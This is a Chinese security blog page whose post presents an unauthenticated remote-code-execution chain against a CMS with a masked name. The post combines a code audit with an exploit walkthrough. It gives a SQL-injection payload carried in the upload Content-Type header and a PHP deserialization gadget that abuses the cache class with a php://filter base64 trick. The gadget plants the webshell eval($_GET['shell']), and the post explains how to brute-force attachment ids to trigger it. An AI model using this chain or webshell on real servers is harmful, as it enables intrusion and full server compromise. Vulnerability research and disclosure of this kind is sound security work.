<!doctype html>
<html lang="zh-cn" >
<head>
    <meta charset="utf-8">
    <link rel="icon" href="data:image/ico;base64,aWNv">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://file.depy.ink/theme/docs/css/bootstrap.min.css?v=8280" rel="stylesheet">
    <link href="https://file.depy.ink/theme/docs/css/main.css?v=3525" rel="stylesheet">
    <script src="https://file.depy.ink/theme/docs/js/jquery.min.js"></script>
    <script src="https://file.depy.ink/theme/docs/js/bootstrap.min.js?v=4094"></script>
    <script src="https://file.depy.ink/theme/docs/js/functions.js?v=8141"></script>
    <script src="https://file.depy.ink/theme/docs/js/marked.min.js"></script>
    <link href="https://file.depy.ink/theme/docs/css/doc.css?v=4299" rel="stylesheet">
    <link rel="stylesheet" href="https://file.depy.ink/assets/editor/editormd/css/editormd.css?v=6567" />
    <script src="https://file.depy.ink/assets/editor/editormd/editormd.js"></script>
    <script src="https://file.depy.ink/assets/editor/editormd/lib/marked.min.js"></script>
    <script src="https://file.depy.ink/assets/editor/editormd/lib/prettify.min.js"></script>

    <script src="https://file.depy.ink/theme/docs/js/pjax.min.js"></script>
    


    <script src="https://file.depy.ink/theme/docs/js/lightbox-plus-jquery.min.js"> </script>
    <link href="https://file.depy.ink/theme/docs/css/lightbox.css?v=3328" rel="stylesheet"><title>P***OK全版本前台无条件RCE</title>
</head>

<body class="bg-light ready sticky" id="watermark">


             <nav class="navbar navbar-expand-lg navbar-light shadow-sm bg-white mybt2 sticky-top">
        <div class="container-fluid" style="max-width:1332px;">
            <a class="navbar-brand" href="/"><b class="">Depy's docs</b></a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                <ul class="navbar-nav mr-auto">
                    <li class="nav-item active">
                        <a class="nav-link" href="/" >首页</a>
                    </li>

                </ul>

            </div>
        </div>
    </nav>


<main>


<aside class="sidebar">
           <div class="sidebar-nav mt-2">
            <ul>
            <li>

 <p>随笔</p>
    <ul>
<li><a href="/view/128.html">小年</a></li>
<li><a href="/view/109.html">❤ 2023</a></li>
    </ul>
 <p>测试笔记</p>
    <ul>
<li><a href="/view/129.html">😡 关于DDOS我能做什么</a></li>
<li><a href="/view/123.html">🐑 某加密样本 Trace分析 - 2</a></li>
<li><a href="/view/121.html">🐑 某加密样本 Trace分析</a></li>
<li><a href="/view/115.html">🔧 轻量级CI/CD+文件内容监控/防篡改解决方案</a></li>
<li><a href="/view/105.html">🍯 有用的命令备份</a></li>
<li><a href="/view/94.html">😊 Gateway-woker实现热重载</a></li>
<li><a href="/view/90.html">✍️ Xposed运行原理</a></li>
<li><a href="/view/89.html">AutoJS 模拟贝塞尔曲线视频滑动</a></li>
<li><a href="/view/84.html">📱 小米13绕过SIM卡打开USB安装</a></li>
    </ul>
 <p>读书笔记</p>
    <ul>
<li><a href="/view/119.html">📚 注入与HOOK</a></li>
<li><a href="/view/117.html">📚《深入探索安卓热修复技术原理》32 -</a></li>
<li><a href="/view/112.html">📚《深入探索安卓热修复技术原理》1-32</a></li>
<li><a href="/view/82.html">📚《逆向工程权威指南》 - 1-4章</a></li>
    </ul>
 <p>编程开发</p>
    <ul>
<li><a href="/view/111.html">🌹 Dobby使用</a></li>
<li><a href="/view/77.html">📑【前端开发】lightbox+pjax最佳实践</a></li>
<li><a href="/view/71.html">📑【NDK开发】NDK采集、压缩、加密传输设备信息</a></li>
<li><a href="/view/70.html">📑【NDK开发】基础环境搭建</a></li>
    </ul>
 <p>逆向分析</p>
    <ul>
<li><a href="/view/139.html">猿人学APP第二题  - 算法分析</a></li>
<li><a href="/view/86.html">⚙️ 【Xposed 改机】- 基础环境安装</a></li>
<li><a href="/view/81.html">💻 安卓内联汇编开发</a></li>
<li><a href="/view/76.html">📑 JNI 使用基础</a></li>
<li><a href="/view/75.html">📑 IDA Debugger 调试器使用</a></li>
<li><a href="/view/74.html">💻 std::string内存布局</a></li>
<li><a href="/view/73.html">💼 Frida作业-20231114</a></li>
<li><a href="/view/65.html">🧮 JSVMP执行流程分析</a></li>
    </ul>
 <p>DepyDocs</p>
    <ul>
<li><a href="/view/122.html">📑 DepyDocs</a></li>
<li><a href="/view/120.html">📑  Un1kMsg使用</a></li>
<li><a href="/view/114.html">📑 联系方式</a></li>
<li><a href="/view/91.html">📑 额外配置</a></li>
<li><a href="/view/88.html">📑  更新日志</a></li>
<li><a href="/view/72.html">📑 时光机使用</a></li>
<li><a href="/view/66.html">📑 DepyOauth接入指南</a></li>
<li><a href="/view/62.html">📑 官方域名申请</a></li>
<li><a href="/view/47.html">📑 租户自定义域名绑定</a></li>
    </ul>
 <p>博客文章（备份）</p>
    <ul>
<li><a href="/view/140.html">P***OK全版本前台无条件RCE</a></li>
<li><a href="/view/138.html">某安全工具逆向破解</a></li>
<li><a href="/view/137.html">浙江省第四届网络与信息安全竞赛决赛WP</a></li>
<li><a href="/view/136.html">流量加密编程开发</a></li>
<li><a href="/view/135.html">Attack PHP Website By Shiro</a></li>
<li><a href="/view/134.html">某OA授权破解分析</a></li>
<li><a href="/view/133.html">Un1kHacking</a></li>
<li><a href="/view/132.html">Un1kLog4shellScan </a></li>
<li><a href="/view/131.html">Netty 开发Mitm解决请求响应匹配问题	</a></li>
    </ul>
 <p>Todo</p>
    <ul>
<li><a href="/view/118.html">Todo List</a></li>
    </ul>


</li>
</ul></div>
</aside><section class="content mx-auto" id="article">
        <div class="d-flex">



            <article class="markdown-section" id="main" style="word-break:break-all;">
                <div>
                <h1>P***OK全版本前台无条件RCE</h1>


                <a style="font-size:12px;color: #5f5d5d;">
                | 时间: 2024-02-09 12:58:52| 目录:博客文章（备份） </a>
                |
                <a style="font-size:12px;color: #007bff;" href="http://10.8.0.3:5080/tenantadmin/Tenantarticle/quickedit/quickedit.html?id=%c2%8c" target="_blank">编辑本文</a>
                <br>


                    <div id="content"><textarea style="display: none;">## 利用条件
网站未关闭游客附件上传（默认开启）

## 代码审计

首先我们进行正常的普通附件上传，发现无论什么图片都无法上传:

![](https://img.meituan.net/imgupload/ed47ab21f89e54a6666a7ac74673f12116944.png)

查看upload控制器代码,代码位于目录/framework/www/中,查看save这个function：

![](https://img.meituan.net/imgupload/b6a068c8ea52e51fd60017d041c05f4a55106.png)

跟进upload_base方法:

![](https://img.meituan.net/imgupload/abd27e03d4e1ee7d56b3963520c5223799145.png)

继续跟进getfile方法：

![](https://img.meituan.net/imgupload/1cacf4b1d6d58516f1873bf81e99115d53329.png)

在此处vardump有输出，所以进入了upload的方法。继续跟进:

![](https://img.meituan.net/imgupload/861e843080ff3bd5ed128296bbe389d072922.png)

![](https://img.meituan.net/imgupload/0377dcfa4d27e7b9e2d1713ee62b8a7266307.png)

我们发现最终是在这里进行了return,原因就是进入了if($bin),如何bypass这个判断呢？

必须要获取$bin变量才可以进入判断，通过var_dump发现就是图片内容。将图片文件内容置空,上传成功

![](https://img.meituan.net/imgupload/9b5aa738632421d6d8a3b4fbadb6883334129.png)

我们回到base_upload方法:

![](https://img.meituan.net/imgupload/3d69fa6ebe4111f4bbe866f5c819c674109391.png)

我们发现这里有个model-&gt;save的方法，跟进save方法：

![](https://img.meituan.net/imgupload/61708fd615224c5c3afd7a045892bbda63884.png)

发现无论是否登录,都有一个插入数据库的方法，并且没有过滤。也就是说他直接将数组$array全部插入了数据库，那我们可以var_dump一下看看有哪些数组字段可控：

![](https://img.meituan.net/imgupload/51bf7b6d42e6e89d7794afae3b8c142486276.png)

我们打印数组后可发现,mime_type字段直接来自于content-type。并且是可控的,我们可以打印一段SQL语句,然后进行拼接操作（不做演示）,最终获取payload:

```
&#39;,sleep(5))#
```

![](https://img.meituan.net/imgupload/20ca7928c0298c9f921c0a6652396b5d125044.png)

我们发现成功sleep了。至此,我们审计到了一个SQL注入漏洞。但是如何通过SQL注入到达RCE呢。 

![](https://img.meituan.net/imgupload/8c7508ef45190b28e99a1157d5d9336146109.png)

继续查看代码发现对attr字段进行了序列化操作,所以有序列化肯定有反序列化。所以抛出第一个问题，如何覆盖序列化的内容？

**1、覆盖**

我们在这里打印数组:

![](https://img.meituan.net/imgupload/4869656c145bb74d74c6fe4a6efaf845105777.png)

我们继续观察SQL语句:

插入:

```
INSERT INTO qinggan_res (`cate_id`,`folder`,`name`,`ext`,`filename`,`addtime`,`title`,`session_id`,`user_id`,`mime_type`,`attr`) VALUES(&#39;&#39;,&#39;res/&#39;,&#39;db0846bb72407e1c.png&#39;,&#39;png&#39;,&#39;res/db0846bb72407e1c.png&#39;,&#39;1608034638&#39;,&#39;3&#39;,&#39;0o8592k55lo99m8r9hg27roid8&#39;,&#39;&#39;,&#39;image/png&#39;,sleep(5))#&#39;,&#39;a:2:{s:5:&#34;width&#34;;i:622;s:6:&#34;height&#34;;i:503;}&#39;)
```

响应:

```
{&#34;status&#34;:&#34;ok&#34;,&#34;content&#34;:{&#34;id&#34;:&#34;117&#34;,&#34;cate_id&#34;:&#34;1&#34;,&#34;folder&#34;:&#34;res\\\\/&#34;,&#34;name&#34;:&#34;db0846bb72407e1c.png&#34;,&#34;ext&#34;:&#34;png&#34;,&#34;filename&#34;:&#34;res\\\\/db0846bb72407e1c.png&#34;,&#34;ico&#34;:&#34;res\\\\/_cache\\\\/_ico\\\\/11\\\\/117.png&#34;,&#34;addtime&#34;:&#34;1608034638&#34;,&#34;title&#34;:&#34;3&#34;,&#34;attr&#34;:&#34;0&#34;,&#34;note&#34;:&#34;&#34;,&#34;session_id&#34;:&#34;0o8592k55lo99m8r9hg27roid8&#34;,&#34;user_id&#34;:&#34;0&#34;,&#34;download&#34;:&#34;0&#34;,&#34;admin_id&#34;:&#34;0&#34;,&#34;mime_type&#34;:&#34;image\\\\/png&#34;,&#34;etype&#34;:&#34;0&#34;,&#34;uploadtime&#34;:&#34;2020-12-15 20:17:18&#34;}}
```

发现我们可控的字段和attr字段相邻，所以进而我们可以直接覆盖attr变量。

什么意思呢？就比如我们可以构造语句为:

![](https://img.meituan.net/imgupload/cdbf4a7a38716a3725966c2d956cbce015038.png)

单引号闭合前面字段的插入,分割后 ) 闭合最前面的括号,然后#注释多余语句。

执行后我们访问数据库:

![](https://img.meituan.net/imgupload/85eb213b4347762bee59fc242eb542fc168824.png)

**2、追加**

再写一条insert 的sql语句，使用英文逗号分割追加即可，具体可见ichunqiu本人对此案例的讲解。这里不赘述。

发现res模型中getone方法就有反序列化操作:

![](https://img.meituan.net/imgupload/30e6fc75991ad1d89df25cf2e304aa7b70379.png)

然后就是写一个可以造成getshell的gadget就行了。但是怎么找呢?

我们成功找到了一个cache类,路径如图所示:

![](https://img.meituan.net/imgupload/c7b90fee7ec5dda1bd2f4d882bb067b794946.png)

它在反序列化的时候会触发destruct魔法函数:

![](https://img.meituan.net/imgupload/a249b3fb8d9e1b1f9e64f982a105eb4513314.png)

跟进save,发现这里有一个file_put_contents的操作:

![](https://img.meituan.net/imgupload/215f4e2e274b4dbecdb7c9dec320cbaf42805.png)

但是这里注意的是为了防止木马生成,加入了exit函数,这个我们在做一道CTF题的时候经常会使用的bypass方法,就是使用:
``` php
file_put_contents(php://filter/write=convert.base64-decode/resource=$id.php,&#39;&lt;?php exit();?&gt;&#39;.base64编码的shellcode)
```

这样外放文件的时候会对整个内容base64解码,导致前面的内容发生错误,而base64编码的shellcode会正常还原。 我们发现他还对我们传入的content进行了序列化的操作，但是序列化不会改变字符串的内容，也就是我们传入的base64编码后的shell内容。

所以最终构造的gadget如下:

``` php
&lt;?php
 class cache{
     protected $key_id;
     protected $key_list;
     protected $folder;
  
     public function __construct(){
         $this-&gt;key_id = &#39;depy&#39;;
         $this-&gt;key_list = &#39;aa&#39;.base64_encode(&#39;&lt;?php eval($_GET[&#34;shell&#34;]);?&gt;&#39;);
         $this-&gt;folder = &#39;php://filter/write=convert.base64-decode/resource=&#39;;
     }
 }
 
 echo bin2hex(serialize(new cache()));
 ```
 
这样,触发反序列化之后,将会在根目录生成depy.php的webshell,密码是shell。那么gadget写完之后,就是找怎么前台可以调用到get_one方法的地方了。

![](https://img.meituan.net/imgupload/a978ea9dc195725a705cd53fb15bca7e78200.png)

我们找到控制器下的replace方法,它根据get oldid参数，然后进入数据库找到我们上传的图片。然后调用get_one方法,触发反序列化。

例如上传图片时,对content type写入我们的gadget。

![](https://img.meituan.net/imgupload/f867a1a80a44e8ac3156a8fc7d2472c2107432.png)

但实际上他并不会响应，插入数据库的时候其实已经触发了反序列化了，会导致服务空白响应。（具体哪里我没有去跟，下面其实也不用去触发）

但是如果是常规流程呢？如何知道id？两个办法：

1、爆破

附件id是自增增加的，不超过四位数，爆破一遍强制触发

2、预上传

先上传一个无效的文件，记住id，那么反序列化时id就是&#43;1

## Exploit
![](https://img.meituan.net/imgupload/305765a85aa3dad77b207f45071f3a419468.png)

通过id,进入replace方法,oldid为上面的id。

![](https://img.meituan.net/imgupload/1f9f13b15cc8c93993eaf04b0b5b6e3636722.png)

通过oldid,会最终触发反序列化生成webshell到根目录。

![](https://img.meituan.net/imgupload/bb02b3d8b501cce3700837bc6ddcb67f80276.png)

![](https://img.meituan.net/imgupload/8c8f013286bbc705370d1dda68a3adb5136947.png)
</textarea></div>


                <script>
                   $(function () {
                        
                        editormd.markdownToHTML("content");
                    })

                </script>




                </div>

                <hr>


                <div>
                    <h5>© 版权声明：非标注『转载』情况下本文为原创文章，版权归&nbsp;<a href="/">Depy's docs</a>&nbsp;所有，转载请联系博主获得授权。</h5>
                </div>

            </article>



    <div class="ad d-none d-lg-block">

        <div style="margin-left: 20px;margin-bottom:15px;font-weight:bold"> 『目录』 </div>
    <div class="anchorContent" id="anchorContent"> </div>
                       </div>

            </div>
    </section>
    <button class="sidebar-toggle sidebar-toggle-button" aria-label="Menu">
        <div><span></span><span></span><span></span></div>
    </button>

</main>

<link href="https://file.depy.ink/theme/docs/css/prettify.css?v=5530" rel="stylesheet">
<script src="https://file.depy.ink/theme/docs/js/prettify.js?v=5764"></script>
<script src="https://file.depy.ink/theme/docs/js/view.js?v=4125"></script>



<script>


    
    function addWatermark({
        container = document.body, 
        width = "220px", 
        height = "160px", 
        textAlign = "center", 
        textBaseline = "middle", 
        font = "16px Microsoft Yahei", 
        fillStyle = "rgba(184, 184, 184, 0.6)", 
        content = "depy|rce.ink", 
        rotate = "45", 
        zIndex = 10000, 
    }) {
        
        const canvas = document.createElement("canvas");
        canvas.setAttribute("width", width);
        canvas.setAttribute("height", height);
        const ctx = canvas.getContext("2d");
        ctx.textAlign = textAlign;
        ctx.textBaseline = textBaseline;
        ctx.font = font;
        ctx.fillStyle = fillStyle;
        ctx.rotate((Math.PI / 180) * rotate);
        ctx.fillText(content, parseFloat(width) / 2, parseFloat(height) / 2);

        
        const base64Url = canvas.toDataURL();
        const __wm = document.querySelector('.__wm');
        const watermarkDiv = __wm || document.createElement("div");
        const styleStr = `
                    position: fixed;
                    top: -70px;
                    left: 0;
                    bottom: 0;
                    right: 0;
                    width: 100%;
                    height: 100%;
                    z-index: ${zIndex};
                    pointer-events: none;
                    background-repeat: repeat;
                    background-image: url('${base64Url}')
                `;
        watermarkDiv.setAttribute("style", styleStr);
        watermarkDiv.classList.add("__wm");
        

        if (!__wm) {
            container.style.position = 'relative';
            container.insertBefore(watermarkDiv, container.firstChild);
        }
            
            const MutationObserver = window.MutationObserver || window.WebKitMutationObserver;
            if (MutationObserver) {
                let mo = new MutationObserver(function () {
                    const __wm = document.querySelector('.__wm');
                    
                    if ((__wm && __wm.getAttribute('style') !== styleStr) || !__wm) {
                        
                        mo.disconnect();
                        mo = null;
                        console.log('1');
                        addWatermark({
                            container: document.getElementById("watermark"),
                            width: "220px",
                            height: "160px",
                            textAlign: "center",
                            textBaseline: "middle",
                            font: "16px Microsoft Yahei",
                            fillStyle: "rgba(184, 184, 184, 0.3 )",
                            content: "depy|rce.ink",
                            rotate: "30",
                            zIndex: 10000,
                        });
                    }
                });

                mo.observe(container, {
                    attributes: true,
                    subtree: true,
                    childList: true
                });
            }
    }



    function addwm(){
    addWatermark({
        container: document.getElementById("watermark"),
        width: "220px",
        height: "160px",
        textAlign: "center",
        textBaseline: "middle",
        font: "16px Microsoft Yahei",
        fillStyle: "rgba(184, 184, 184, 0.3 )",
        content: "depy|rce.ink",
        rotate: "30",
        zIndex: 10000,
    });
}

addwm();
</script>

</body>
</html>